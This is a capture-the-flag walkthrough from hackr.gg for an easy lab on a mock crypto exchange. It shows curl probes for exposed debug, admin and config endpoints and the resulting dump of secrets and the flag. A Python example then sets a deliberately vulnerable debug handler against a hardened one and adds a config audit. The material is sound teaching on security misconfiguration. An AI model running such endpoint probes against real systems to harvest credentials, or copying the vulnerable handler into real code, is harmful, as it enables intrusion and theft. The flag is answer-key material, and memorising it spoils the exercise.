hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Exchange Platform — CryptoBurner

Category: Security Misconfiguration · Debug Mode Exposure
Difficulty: Easy
Vuln class: Security Misconfiguration / Debug Mode Exposure
Steps: 3
// Objective
Discover exposed debug endpoints and misconfigured routes on CryptoBurner's exchange platform to retrieve secrets and the flag.
// Tools required
Browser, curl, ffuf
// Step-by-step walkthrough
1. Browse the application normally
Open the CryptoBurner exchange. It looks like a standard crypto trading platform. Your goal is to find endpoints that should not be accessible in production.
Misconfigurations are often invisible on the surface. You need to probe for hidden routes, debug panels, and exposed configuration.
2. Look for common debug endpoints
Many frameworks expose debug or admin endpoints by default that developers forget to disable before going live. Try common paths.
Command / Input
curl http://target.lab/debug
curl http://target.lab/console
curl http://target.lab/admin
curl http://target.lab/env
curl http://target.lab/config
Output
GET /debug → 200 OK
{"debug":true,"environment":"production","DB_PASSWORD":"hunter2","SECRET_KEY":"dev-secret-123","FLAG":"HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}"}
Debug mode was left on in production: the response itself says "environment":"production" alongside "debug":true. The /debug endpoint dumps the entire application environment, including secrets.
3. Retrieve the flag
The flag is in the debug endpoint JSON response.
Output
HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}
In a real breach this endpoint would also expose database credentials, API keys for payment processors, and internal service hostnames.
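As an added example (not code from the hackr.gg walkthrough or from CryptoBurner), the same debug route written two ways in Python: the vulnerable handler that honours the debug flag no matter the environment, and a hardened one that refuses to serve in production and redacts secret-like keys elsewhere, plus the pre-deploy check that would have caught this configuration. SAMPLE_CONFIG is a constructed configuration mirroring the dump in step 2.

```python
import json
import re

# Constructed sample configuration mirroring the walkthrough's /debug dump:
# debug left on while the environment is declared "production".
SAMPLE_CONFIG = {
    "debug": True,
    "environment": "production",
    "DB_PASSWORD": "hunter2",
    "SECRET_KEY": "dev-secret-123",
    "FLAG": "HackrGG{constructed-sample}",
}

# Key names that should never reach a response body, even in development.
SENSITIVE_KEY = re.compile(r"PASSWORD|SECRET|KEY|TOKEN|FLAG", re.IGNORECASE)


def vulnerable_debug_endpoint(cfg):
    """Before: trusts cfg['debug'] alone and serialises the whole config."""
    if cfg.get("debug"):
        return 200, json.dumps(cfg)
    return 404, ""


def hardened_debug_endpoint(cfg):
    """After: the route does not exist in production, whatever 'debug' says,
    and outside production every secret-like value is redacted."""
    if cfg.get("environment") == "production" or not cfg.get("debug"):
        return 404, ""  # indistinguishable from an unregistered route
    redacted = {k: ("[REDACTED]" if SENSITIVE_KEY.search(k) else v)
                for k, v in cfg.items()}
    return 200, json.dumps(redacted)


def audit_config(cfg):
    """Pre-deploy gate: return the findings a CI job should fail the build on.
    Secrets belong in a secret store, not in config that a web handler can dump."""
    findings = []
    if cfg.get("environment") == "production" and cfg.get("debug"):
        findings.append("debug enabled in production")
    for key in cfg:
        if SENSITIVE_KEY.search(key):
            findings.append(f"secret-like key in web-visible config: {key}")
    return findings


if __name__ == "__main__":
    print(vulnerable_debug_endpoint(SAMPLE_CONFIG))
    print(hardened_debug_endpoint(SAMPLE_CONFIG))
    print(audit_config(SAMPLE_CONFIG))
```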
// Flag
Flag value: HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}
Found in the /debug endpoint response left enabled in production.